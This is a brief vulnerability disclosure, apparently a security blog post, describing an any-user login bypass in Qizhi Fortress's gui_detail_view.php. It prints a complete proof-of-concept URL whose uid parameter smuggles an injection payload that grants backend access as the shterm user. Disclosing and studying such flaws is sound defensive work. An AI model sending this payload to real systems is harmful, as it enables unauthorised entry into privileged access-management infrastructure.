Qizhi Fortress Gui_detail_view Php Any User Login Vulnerability
Qizhi Fortress Gui_detail_view Php Any User Login Vulnerability
Qizhi Fortress gui_detail_view.php Any user login vulnerability
Vulnerability Description
Qizhi Fortress has a login vulnerability for any user. You can get backend permissions by accessing a specific Url.
Vulnerability Impact
Qizhi Fortress
Network surveying and mapping
Vulnerability reappears
The vulnerability POC is
https://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
This post is licensed under CC BY 4.0 by the author.